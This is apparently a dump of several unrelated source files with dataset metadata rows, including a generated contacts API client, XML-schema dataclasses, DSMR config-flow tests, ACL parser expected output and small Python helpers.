>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str contact_id: contactId (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ContactDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'contact_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contact" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'contact_id' is set
if self.api_client.client_side_validation and ('contact_id' not in local_var_params or # noqa: E501
local_var_params['contact_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `contact_id` when calling `get_contact`") # noqa: E501
collection_formats = {}
path_params = {}
if 'contact_id' in local_var_params:
path_params['contactId'] = local_var_params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/contacts/{contactId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ContactDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_contact_v_card(self, contact_id, **kwargs): # noqa: E501
"""Get contact vCard vcf file # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contact_v_card(contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str contact_id: contactId (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_contact_v_card_with_http_info(contact_id, **kwargs) # noqa: E501
def get_contact_v_card_with_http_info(self, contact_id, **kwargs): # noqa: E501
"""Get contact vCard vcf file # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contact_v_card_with_http_info(contact_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str contact_id: contactId (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(str, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'contact_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contact_v_card" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'contact_id' is set
if self.api_client.client_side_validation and ('contact_id' not in local_var_params or # noqa: E501
local_var_params['contact_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `contact_id` when calling `get_contact_v_card`") # noqa: E501
collection_formats = {}
path_params = {}
if 'contact_id' in local_var_params:
path_params['contactId'] = local_var_params['contact_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/octet-stream']) # noqa: E501
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/contacts/{contactId}/download', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_contacts(self, **kwargs): # noqa: E501
"""Get all contacts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contacts(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: list[ContactProjection]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_contacts_with_http_info(**kwargs) # noqa: E501
def get_contacts_with_http_info(self, **kwargs): # noqa: E501
"""Get all contacts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_contacts_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(list[ContactProjection], status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_contacts" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['API_KEY'] # noqa: E501
return self.api_client.call_api(
'/contacts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ContactProjection]', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
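For orientation, a typical call into this generated client looks like the
sketch below. The controller class name and the `ApiClient` setup are
assumptions based on standard openapi-generator output, not confirmed by this
file.

# Hypothetical usage sketch: names assumed from openapi-generator conventions.
api = ContactControllerApi(api_client)       # enclosing class name is assumed
contacts = api.get_contacts()                # synchronous -> list[ContactProjection]
thread = api.get_contacts(async_req=True)    # asynchronous variant
contacts = thread.get()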
| 43.351464 | 487 | 0.590065 | 3,413 | 31,083 | 5.118371 | 0.069733 | 0.041674 | 0.063312 | 0.030912 | 0.913218 | 0.909726 | 0.9032 | 0.901311 | 0.878871 | 0.874005 | 0 | 0.012964 | 0.337419 | 31,083 | 716 | 488 | 43.412011 | 0.835251 | 0.458868 | 0 | 0.697059 | 0 | 0 | 0.164253 | 0.045139 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038235 | false | 0 | 0.014706 | 0 | 0.091176 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9fb65b57d2f2bc39e6e3a9c6f9fac58f0dea3de | 1,509 | py | Python | output/models/ms_data/particles/particles_z008_xsd/particles_z008.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | 1 | 2021-08-14T17:59:21.000Z | 2021-08-14T17:59:21.000Z | output/models/ms_data/particles/particles_z008_xsd/particles_z008.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | 4 | 2020-02-12T21:30:44.000Z | 2020-04-15T20:06:46.000Z | output/models/ms_data/particles/particles_z008_xsd/particles_z008.py | tefra/xsdata-w3c-tests | b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f | [
"MIT"
] | null | null | null | from dataclasses import dataclass, field
from typing import Optional
__NAMESPACE__ = "urn:my-namespace"
@dataclass
class ContainHead2Type:
member2: Optional[str] = field(
default=None,
metadata={
"name": "Member2",
"type": "Element",
"namespace": "urn:my-namespace",
}
)
head2: Optional[str] = field(
default=None,
metadata={
"name": "Head2",
"type": "Element",
"namespace": "urn:my-namespace",
}
)
@dataclass
class ContainMember2Type:
member2: Optional[str] = field(
default=None,
metadata={
"name": "Member2",
"type": "Element",
"namespace": "urn:my-namespace",
"required": True,
}
)
head2: Optional[str] = field(
default=None,
metadata={
"name": "Head2",
"type": "Element",
"namespace": "urn:my-namespace",
}
)
@dataclass
class Head2:
class Meta:
namespace = "urn:my-namespace"
value: str = field(
default="",
metadata={
"required": True,
}
)
@dataclass
class Member2:
class Meta:
namespace = "urn:my-namespace"
value: str = field(
default="",
metadata={
"required": True,
}
)
@dataclass
class Root(ContainMember2Type):
class Meta:
name = "root"
namespace = "urn:my-namespace"
| 19.101266 | 44 | 0.503645 | 125 | 1,509 | 6.048 | 0.216 | 0.126984 | 0.148148 | 0.243386 | 0.763228 | 0.763228 | 0.714286 | 0.714286 | 0.714286 | 0.714286 | 0 | 0.013584 | 0.365805 | 1,509 | 78 | 45 | 19.346154 | 0.776385 | 0 | 0 | 0.676923 | 0 | 0 | 0.182903 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.030769 | 0 | 0.246154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e02d9a747a62e7e25852ddfea65d2e77ec57e0d4 | 69 | py | Python | fds/datax/_get_data/__init__.py | factset/fds-datax | 4796d65b3ad25b4295999f59d3244db1b8eace6f | [
"Apache-2.0"
] | 1 | 2022-02-01T19:12:23.000Z | 2022-02-01T19:12:23.000Z | fds/datax/_get_data/__init__.py | factset/fds-datax | 4796d65b3ad25b4295999f59d3244db1b8eace6f | [
"Apache-2.0"
] | null | null | null | fds/datax/_get_data/__init__.py | factset/fds-datax | 4796d65b3ad25b4295999f59d3244db1b8eace6f | [
"Apache-2.0"
] | null | null | null | from fds.datax._get_data._get_data import (GetSDFData as getsdfdata)
| 34.5 | 68 | 0.84058 | 11 | 69 | 4.909091 | 0.727273 | 0.259259 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 69 | 1 | 69 | 69 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0edaa345d001facc259399202f5810f0bf4901fe | 8,205 | py | Python | tests/components/dsmr/test_config_flow.py | pcaston/core | e74d946cef7a9d4e232ae9e0ba150d18018cfe33 | [
"Apache-2.0"
] | 1 | 2021-07-08T20:09:55.000Z | 2021-07-08T20:09:55.000Z | tests/components/dsmr/test_config_flow.py | pcaston/core | e74d946cef7a9d4e232ae9e0ba150d18018cfe33 | [
"Apache-2.0"
] | 47 | 2021-02-21T23:43:07.000Z | 2022-03-31T06:07:10.000Z | tests/components/dsmr/test_config_flow.py | OpenPeerPower/core | f673dfac9f2d0c48fa30af37b0a99df9dd6640ee | [
"Apache-2.0"
] | null | null | null | """Test the DSMR config flow."""
import asyncio
from itertools import chain, repeat
from unittest.mock import DEFAULT, AsyncMock, patch
import serial
from openpeerpower import config_entries, data_entry_flow, setup
from openpeerpower.components.dsmr import DOMAIN
from tests.common import MockConfigEntry
SERIAL_DATA = {"serial_id": "12345678", "serial_id_gas": "123456789"}
async def test_import_usb(opp, dsmr_connection_send_validate_fixture):
"""Test we can import."""
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
with patch("openpeerpower.components.dsmr.async_setup_entry", return_value=True):
result = await opp.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=entry_data,
)
assert result["type"] == "create_entry"
assert result["title"] == "/dev/ttyUSB0"
assert result["data"] == {**entry_data, **SERIAL_DATA}
async def test_import_usb_failed_connection(opp, dsmr_connection_send_validate_fixture):
"""Test we can import."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
# override the mock to have it fail the first time and succeed after
first_fail_connection_factory = AsyncMock(
return_value=(transport, protocol),
side_effect=chain([serial.serialutil.SerialException], repeat(DEFAULT)),
)
with patch(
"openpeerpower.components.dsmr.async_setup_entry", return_value=True
), patch(
"openpeerpower.components.dsmr.config_flow.create_dsmr_reader",
first_fail_connection_factory,
):
result = await opp.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=entry_data,
)
assert result["type"] == "abort"
assert result["reason"] == "cannot_connect"
async def test_import_usb_no_data(opp, dsmr_connection_send_validate_fixture):
"""Test we can import."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
    # override wait_closed to time out on the first call and succeed after
wait_closed = AsyncMock(
return_value=(transport, protocol),
side_effect=chain([asyncio.TimeoutError], repeat(DEFAULT)),
)
protocol.wait_closed = wait_closed
with patch("openpeerpower.components.dsmr.async_setup_entry", return_value=True):
result = await opp.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=entry_data,
)
assert result["type"] == "abort"
assert result["reason"] == "cannot_communicate"
async def test_import_usb_wrong_telegram(opp, dsmr_connection_send_validate_fixture):
"""Test we can import."""
(connection_factory, transport, protocol) = dsmr_connection_send_validate_fixture
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
protocol.telegram = {}
with patch("openpeerpower.components.dsmr.async_setup_entry", return_value=True):
result = await opp.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=entry_data,
)
assert result["type"] == "abort"
assert result["reason"] == "cannot_communicate"
async def test_import_network(opp, dsmr_connection_send_validate_fixture):
"""Test we can import from network."""
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"host": "localhost",
"port": "1234",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
with patch("openpeerpower.components.dsmr.async_setup_entry", return_value=True):
result = await opp.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=entry_data,
)
assert result["type"] == "create_entry"
assert result["title"] == "localhost:1234"
assert result["data"] == {**entry_data, **SERIAL_DATA}
async def test_import_update(opp, dsmr_connection_send_validate_fixture):
"""Test we can import."""
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
entry = MockConfigEntry(
domain=DOMAIN,
data=entry_data,
unique_id="/dev/ttyUSB0",
)
entry.add_to_opp(opp)
with patch(
"openpeerpower.components.dsmr.async_setup_entry", return_value=True
), patch("openpeerpower.components.dsmr.async_unload_entry", return_value=True):
await opp.config_entries.async_setup(entry.entry_id)
await opp.async_block_till_done()
new_entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 3,
"reconnect_interval": 30,
}
with patch(
"openpeerpower.components.dsmr.async_setup_entry", return_value=True
), patch("openpeerpower.components.dsmr.async_unload_entry", return_value=True):
result = await opp.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=new_entry_data,
)
await opp.async_block_till_done()
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
assert entry.data["precision"] == 3
async def test_options_flow(opp):
"""Test options flow."""
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "2.2",
"precision": 4,
"reconnect_interval": 30,
}
entry = MockConfigEntry(
domain=DOMAIN,
data=entry_data,
unique_id="/dev/ttyUSB0",
)
entry.add_to_opp(opp)
result = await opp.config_entries.options.async_init(entry.entry_id)
assert result["type"] == "form"
assert result["step_id"] == "init"
result = await opp.config_entries.options.async_configure(
result["flow_id"],
user_input={
"time_between_update": 15,
},
)
with patch(
"openpeerpower.components.dsmr.async_setup_entry", return_value=True
), patch("openpeerpower.components.dsmr.async_unload_entry", return_value=True):
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
await opp.async_block_till_done()
assert entry.options == {"time_between_update": 15}
async def test_import_luxembourg(opp, dsmr_connection_send_validate_fixture):
"""Test we can import."""
await setup.async_setup_component(opp, "persistent_notification", {})
entry_data = {
"port": "/dev/ttyUSB0",
"dsmr_version": "5L",
"precision": 4,
"reconnect_interval": 30,
}
with patch("openpeerpower.components.dsmr.async_setup_entry", return_value=True):
result = await opp.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data=entry_data,
)
assert result["type"] == "create_entry"
assert result["title"] == "/dev/ttyUSB0"
assert result["data"] == {**entry_data, **SERIAL_DATA}
| 30.845865 | 88 | 0.65521 | 928 | 8,205 | 5.510776 | 0.131466 | 0.038717 | 0.073915 | 0.081345 | 0.811107 | 0.801721 | 0.796637 | 0.762417 | 0.742081 | 0.742081 | 0 | 0.013484 | 0.222669 | 8,205 | 265 | 89 | 30.962264 | 0.788335 | 0.019622 | 0 | 0.645833 | 0 | 0 | 0.22492 | 0.103642 | 0 | 0 | 0 | 0 | 0.114583 | 1 | 0 | false | 0 | 0.109375 | 0 | 0.109375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0efbcbcedd750b6cc8e00716e55da8079daef7c4 | 48 | py | Python | app/Camera/__init__.py | gizmo-cda/g2x | 841364b8ef4ef4197bbb3682f33ff4ddd539619f | [
"MIT"
] | null | null | null | app/Camera/__init__.py | gizmo-cda/g2x | 841364b8ef4ef4197bbb3682f33ff4ddd539619f | [
"MIT"
] | null | null | null | app/Camera/__init__.py | gizmo-cda/g2x | 841364b8ef4ef4197bbb3682f33ff4ddd539619f | [
"MIT"
] | null | null | null | from .camera_controller import CameraController
| 24 | 47 | 0.895833 | 5 | 48 | 8.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 48 | 1 | 48 | 48 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
160052f0e99ceed94956511a2be3a21c5039bdea | 4,109 | py | Python | src/genie/libs/parser/ios/tests/ShowAccessLists/cli/equal/golden_output_standard_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/ios/tests/ShowAccessLists/cli/equal/golden_output_standard_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/ios/tests/ShowAccessLists/cli/equal/golden_output_standard_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z | expected_output = {
"1": {
"aces": {
"10": {
"actions": {"forwarding": "permit"},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"172.20.10.10 0.0.0.0": {
"source_network": "172.20.10.10 0.0.0.0"
}
},
}
}
},
"name": "10",
}
},
"name": "1",
"type": "ipv4-acl-type",
"acl_type": "standard",
},
"10": {
"aces": {
"10": {
"actions": {"forwarding": "permit"},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"10.66.12.12 0.0.0.0": {
"source_network": "10.66.12.12 0.0.0.0"
}
},
}
}
},
"name": "10",
}
},
"name": "10",
"type": "ipv4-acl-type",
"acl_type": "standard",
},
"12": {
"aces": {
"10": {
"actions": {"forwarding": "deny"},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"10.16.3.2 0.0.0.0": {
"source_network": "10.16.3.2 0.0.0.0"
}
},
}
}
},
"name": "10",
}
},
"name": "12",
"type": "ipv4-acl-type",
"acl_type": "standard",
},
"32": {
"aces": {
"10": {
"actions": {"forwarding": "permit"},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"172.20.20.20 0.0.0.0": {
"source_network": "172.20.20.20 0.0.0.0"
}
},
}
}
},
"name": "10",
}
},
"name": "32",
"type": "ipv4-acl-type",
"acl_type": "standard",
},
"34": {
"aces": {
"10": {
"actions": {"forwarding": "permit"},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"10.24.35.56 0.0.0.0": {
"source_network": "10.24.35.56 0.0.0.0"
}
},
}
}
},
"name": "10",
},
"20": {
"actions": {"forwarding": "permit"},
"matches": {
"l3": {
"ipv4": {
"protocol": "ipv4",
"source_network": {
"10.34.56.34 0.0.0.0": {
"source_network": "10.34.56.34 0.0.0.0"
}
},
}
}
},
"name": "20",
},
},
"name": "34",
"type": "ipv4-acl-type",
"acl_type": "standard",
},
}
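For reference, entries of this shape are parsed from standard numbered ACLs in
`show access-lists` output; the first few blocks above correspond to device
output along these (illustrative) lines:

Standard IP access list 1
    10 permit 172.20.10.10
Standard IP access list 10
    10 permit 10.66.12.12
Standard IP access list 12
    10 deny   10.16.3.2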
| 30.664179 | 76 | 0.212704 | 243 | 4,109 | 3.522634 | 0.131687 | 0.084112 | 0.084112 | 0.056075 | 0.921729 | 0.917056 | 0.910047 | 0.688084 | 0.658879 | 0.658879 | 0 | 0.14208 | 0.642005 | 4,109 | 133 | 77 | 30.894737 | 0.439837 | 0 | 0 | 0.466165 | 0 | 0 | 0.23193 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
160a304ecffe78028044638bda82a29216821949 | 109 | py | Python | bank_import/admin.py | oronibrian/Tenant | 42662797db54f8f169a570c920795c487ce3896a | [
"MIT"
] | 24 | 2015-01-28T20:02:27.000Z | 2021-10-03T15:29:44.000Z | bank_import/admin.py | oronibrian/Tenant | 42662797db54f8f169a570c920795c487ce3896a | [
"MIT"
] | 31 | 2015-01-19T20:51:40.000Z | 2018-12-13T14:54:01.000Z | bank_import/admin.py | oronibrian/Tenant | 42662797db54f8f169a570c920795c487ce3896a | [
"MIT"
] | 20 | 2015-11-15T14:07:20.000Z | 2021-10-03T17:07:42.000Z | from django.contrib import admin
from django.utils.translation import ugettext as _
from main import models
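No models are registered yet; a typical registration using the imported
`models` module would look like the sketch below. The model name is
hypothetical and not confirmed by this file.

@admin.register(models.Tenant)  # hypothetical model name
class TenantAdmin(admin.ModelAdmin):
    list_display = ('__str__',)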
| 21.8 | 50 | 0.834862 | 16 | 109 | 5.625 | 0.6875 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137615 | 109 | 4 | 51 | 27.25 | 0.957447 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
161640ce273e36587af221c46e1ffaec6d83e90f | 109 | py | Python | ComRISB/pygtool/init_subval_tsolver.py | comscope/comsuite | d51c43cad0d15dc3b4d1f45e7df777cdddaa9d6c | [
"BSD-3-Clause"
] | 18 | 2019-06-15T18:08:21.000Z | 2022-01-30T05:01:29.000Z | ComRISB/pygtool/init_subval_tsolver.py | comscope/Comsuite | b80ca9f34c519757d337487c489fb655f7598cc2 | [
"BSD-3-Clause"
] | null | null | null | ComRISB/pygtool/init_subval_tsolver.py | comscope/Comsuite | b80ca9f34c519757d337487c489fb655f7598cc2 | [
"BSD-3-Clause"
] | 11 | 2019-06-05T02:57:55.000Z | 2021-12-29T02:54:25.000Z | #!/usr/bin/env python
from pyglib.gutz.init_subval_tsolver import init_subval_tsolver
init_subval_tsolver()
| 21.8 | 63 | 0.844037 | 17 | 109 | 5.058824 | 0.647059 | 0.348837 | 0.593023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073395 | 109 | 4 | 64 | 27.25 | 0.851485 | 0.183486 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
161678b591e93e2670ebc1fa0343af69414e03ac | 457 | py | Python | course-material/platform-services/analysis-service/utils/helpers.py | estensen/spacemaker-docker-kubernetes-course | bc0e03ed11a227b74c0457241fb6c48c8f8ada3c | [
"MIT"
] | null | null | null | course-material/platform-services/analysis-service/utils/helpers.py | estensen/spacemaker-docker-kubernetes-course | bc0e03ed11a227b74c0457241fb6c48c8f8ada3c | [
"MIT"
] | null | null | null | course-material/platform-services/analysis-service/utils/helpers.py | estensen/spacemaker-docker-kubernetes-course | bc0e03ed11a227b74c0457241fb6c48c8f8ada3c | [
"MIT"
] | null | null | null | import numpy as np
def get_polygon_cords(building_data):
    """Return the four corners of an axis-aligned rectangular building
    footprint defined by its origin (x, y) and extents (dx, dy)."""
    return np.array(
[
[building_data["x"], building_data["y"]],
[building_data["x"] + building_data["dx"], building_data["y"]],
[
building_data["x"] + building_data["dx"],
building_data["y"] + building_data["dy"],
],
[building_data["x"], building_data["y"] + building_data["dy"]],
]
)
